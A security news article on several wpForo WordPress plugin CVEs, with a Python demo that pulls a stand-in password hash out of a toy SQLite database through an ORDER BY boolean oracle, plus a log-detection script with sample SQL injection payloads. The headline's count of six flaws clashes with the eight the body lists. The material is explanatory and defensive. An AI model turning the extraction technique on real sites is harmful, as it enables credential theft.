PROBABLYPWNED
Vulnerabilities · March 1, 2026 · 3 min read

wpForo Forum Plugin Hit by Six Critical Vulnerabilities

WordPress plugin wpForo 2.4.14 contains unauthenticated SQL injection, PHP object injection, and multiple authorization bypass flaws. Over 80,000 sites at risk.

Marcus Chen

Security researchers disclosed a cluster of vulnerabilities, eight CVEs in total, in wpForo Forum, a popular WordPress plugin with over 80,000 active installations. The flaws range from unauthenticated SQL injection to PHP object injection with RCE potential, giving attackers several independent paths into WordPress sites that run the plugin.

The most severe issues, CVE-2026-28562 and CVE-2026-1581, let unauthenticated attackers extract credentials and other sensitive data directly from the WordPress database. No login is required. Both flaws are present in wpForo 2.4.14, the current release as of this disclosure.

Unauthenticated SQL Injection (CVE-2026-28562 and CVE-2026-1581)

CVE-2026-28562 sits in the Topics::get_topics() function, where a caller-controlled ORDER BY value is passed through esc_sql() and concatenated into the query. esc_sql() escapes quote characters, which neutralizes injection inside a quoted string literal but does nothing for a bare identifier such as a sort column: a payload in that position needs no quotes at all. Attackers place CASE WHEN expressions in the wpfob parameter and use the resulting sort order as a boolean oracle, extracting credentials one character at a time.

CVE-2026-1581 is a time-based blind variant on the same wpfob parameter and affects every version through 2.4.14. Because the query is built by string concatenation rather than a prepared statement, an attacker can inject an expression whose evaluation time depends on a condition and read the answer from the response delay.

Both attacks work against default wpForo configurations with no prerequisite access, and automated exploitation is straightforward once the injection point is identified.
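The following is an added example, not wpForo's code, that shows the class of bug behind CVE-2026-28562 and the fix for it: quote-escaping (the job esc_sql() does) cannot protect a bare ORDER BY identifier, a CASE WHEN expression in that position turns the sort order into a boolean oracle, and an allowlist of sort columns closes the hole. Everything in it is constructed: an in-memory SQLite database standing in for the WordPress tables, a toy escaping routine, and a plaintext stand-in for a password hash. The real wpForo query and schema are not reproduced.

```python
# Added example, not wpForo's code: escaping versus allowlisting for an
# ORDER BY identifier, with a boolean-blind oracle run against the escaped
# version. All data and helpers here are constructed for the demonstration.
import sqlite3

# Assumption: the sortable columns a caller may legitimately name.
ALLOWED_SORT_COLUMNS = {"id", "title", "created"}


def open_demo_db():
    """Constructed schema: 'users' stands in for wp_users, 'topics' for the forum table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users(id INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES (1, 'admin', '$P$Bsecret');
        CREATE TABLE topics(id INTEGER, title TEXT, created INTEGER);
        INSERT INTO topics VALUES (1, 'alpha', 10), (2, 'beta', 20), (3, 'gamma', 30);
        """
    )
    return con


def esc_sql(value):
    """Toy stand-in for esc_sql(): escapes quotes and backslashes.
    Adequate inside a quoted string literal, irrelevant for an identifier."""
    return value.replace("\\", "\\\\").replace("'", "''").replace('"', '""')


def get_topics_vulnerable(con, orderby):
    """The flawed pattern: sort column concatenated into the query after escaping only."""
    rows = con.execute("SELECT id FROM topics ORDER BY " + esc_sql(orderby))
    return [r[0] for r in rows]


def is_allowed_sort_column(orderby):
    """The fix: identifiers cannot be bound as parameters, so they must be allowlisted."""
    return orderby in ALLOWED_SORT_COLUMNS


def get_topics_hardened(con, orderby):
    """Same query, but only a known column name ever reaches the SQL string."""
    if not is_allowed_sort_column(orderby):
        raise ValueError("unknown sort column: %r" % orderby)
    rows = con.execute("SELECT id FROM topics ORDER BY " + orderby)
    return [r[0] for r in rows]


def byte_greater_than(con, position, threshold):
    """Boolean oracle, one page request per question. The payload contains no quote
    characters, so escaping leaves it untouched. TRUE sorts ascending, FALSE descending."""
    payload = (
        "CASE WHEN (SELECT unicode(substr(user_pass, %d, 1)) FROM users WHERE id = 1) > %d "
        "THEN id ELSE -id END" % (position, threshold)
    )
    return get_topics_vulnerable(con, payload) == [1, 2, 3]


def extract_secret(con, length):
    """Binary-search each character of the stand-in hash through the oracle
    (seven queries per character for 7-bit values)."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if byte_greater_than(con, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = open_demo_db()
    print("leaked via ORDER BY oracle:", extract_secret(db, 10))
    try:
        get_topics_hardened(db, "CASE WHEN 1=1 THEN id ELSE -id END")
    except ValueError as exc:
        print("allowlist rejected:", exc)
```

The hardened version still concatenates, which is unavoidable for identifiers; what makes it safe is that the concatenated value can only ever be one of three known strings. A regex that merely checks the value "looks like" a column name is weaker than a fixed set, because it has to be kept in step with whatever the database will accept.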

PHP Object Injection (CVE-2026-0910)

CVE-2026-0910 affects versions through 2.4.13 and stems from unsafe deserialization in the wpforo_display_array_data function. An authenticated attacker with subscriber-level access can supply a serialized PHP object; whether that escalates to remote code execution depends on which gadget chains (classes with exploitable magic methods) are loaded from other plugins and themes on the target site.

The patch for this shipped in version 2.4.14, but 2.4.14 still carries the SQL injection flaws described above (CVE-2026-1581 affects every release through 2.4.14). Sites that upgraded to close the object injection hole remain exposed to a different critical vulnerability.

Authorization Bypass Flaws

Three additional CVEs affect wpForo 2.4.14's authorization model:

CVE-2026-28557: Authenticated users can trigger bulk usergroup reassignment via the wpforo_synch_roles AJAX handler. An attacker obtains a nonce from the usergroups admin page, then remaps all wpForo usergroups to arbitrary WordPress roles, potentially escalating privileges site-wide.

CVE-2026-28554: Subscribers can approve or unapprove any forum post through the wpforo_approve_ajax handler. The handler checks only the nonce. A WordPress nonce proves that the request originated from a page served to a logged-in user (it is a CSRF token), not that the user holds moderator permissions, so any subscriber passes the check.

CVE-2026-28556: Authenticated subscribers can move, merge, or split any forum topic via the topic_move, topic_merge, and topic_split handlers. Again, the handlers validate the nonce but never check a capability, so content can be manipulated without proper authorization.

Information Disclosure (CVE-2026-28559)

CVE-2026-28559 lets unauthenticated users retrieve private and unapproved topics through the global RSS feed endpoint. Requesting the feed without a forum ID parameter bypasses privacy and status WHERE clauses, exposing content that should remain hidden.

Stored XSS (CVE-2026-28561)

Administrators can inject persistent JavaScript through forum description fields; the value is echoed in multiple theme template files without output escaping. Exploitation requires administrator access, but it gives a compromised or malicious admin account a persistence mechanism and a way to attack other administrators who view the affected forum pages.

What Admins Should Do

The disclosure leaves operators in a difficult position. Version 2.4.13 has the PHP object injection flaw. Version 2.4.14 has the SQL injection and authorization bypass flaws. Rolling back is no answer either, since CVE-2026-1581 affects every release through 2.4.14. No fully patched version exists as of this writing.

For WordPress sites running wpForo that can't afford to disable the plugin:

  1. Deploy WAF rules that reject requests whose wpfob parameter is anything other than a plain sort identifier; an allowlist on the value's shape is harder to bypass than a blocklist of SQL keywords
  2. Restrict forum access to authenticated users only where possible (this does not help against CVE-2026-28554, CVE-2026-28556 or CVE-2026-28557, which subscribers can exploit)
  3. Monitor web server and database logs for wpfob values containing CASE, WHEN, SLEEP or BENCHMARK, and for bursts of near-identical requests that indicate blind extraction
  4. Disable the RSS feed functionality to prevent CVE-2026-28559
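As an added example of steps 1 and 3 (not from the advisory or the wpForo project), the following check flags requests whose wpfob parameter is anything other than a plain sort identifier. The log lines are constructed in combined-log format; the legitimate shape of wpfob (a single identifier-like token) and its use as a GET parameter are assumptions. The same shape test can be expressed as a WAF rule; here it is run over log lines so that past exploitation attempts can be found as well.

```python
# Added example, not from the advisory or wpForo: allowlist-shaped detection
# for the wpfob parameter over constructed combined-format access-log lines.
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate sort value is one identifier (letters, digits, underscore, dot).
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*$")

# Minimal combined-log parser: client address and the quoted request line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Constructed sample: one benign sort, one boolean-style payload, one time-based
# payload, one request without wpfob at all.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2026:10:00:01 +0000] "GET /community/?wpfob=title HTTP/1.1" 200 5120
198.51.100.7 - - [01/Mar/2026:10:00:02 +0000] "GET /community/?wpfob=CASE+WHEN+(SELECT+1)%3D1+THEN+id+ELSE+title+END HTTP/1.1" 200 5120
203.0.113.9 - - [01/Mar/2026:10:00:03 +0000] "GET /community/?wpfob=(SELECT+SLEEP(5)) HTTP/1.1" 200 5120
203.0.113.9 - - [01/Mar/2026:10:00:04 +0000] "GET /community/?page=2 HTTP/1.1" 200 5120
"""


def parse_request(line):
    """Return (client_ip, decoded wpfob values) for one log line, or None if unparseable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qs URL-decodes, so '+' and %XX sequences are resolved before the check.
    values = parse_qs(query, keep_blank_values=True).get("wpfob", [])
    return m.group("ip"), values


def is_suspicious_wpfob(value):
    """Anything that is not a single identifier fails the allowlist."""
    return IDENTIFIER.match(value) is None


def flag_requests(log_text):
    """Collect (client_ip, decoded_value) for every wpfob value that fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, values = parsed
        for value in values:
            if is_suspicious_wpfob(value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in flag_requests(SAMPLE_LOG):
        print("%s  wpfob=%r" % (ip, value))
```

Decoding before matching matters: the second sample line carries `%3D` and `+` encoding, and a rule applied to the raw query string would have to anticipate every encoding an attacker might choose. The check covers only a GET parameter named wpfob; if the plugin also accepts the value in a POST body, the WAF rule needs to inspect that as well.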

This situation echoes the WordPress plugin vulnerability surge we've tracked throughout 2026. The CleanTalk plugin CVE-2026-1490 auth bypass two weeks ago and the ACF Extended admin takeover flaw show the pattern continuing.

Site operators should monitor wpForo's changelog for a patched release and apply it immediately when available. Until then, consider whether the forum functionality justifies the exposure.
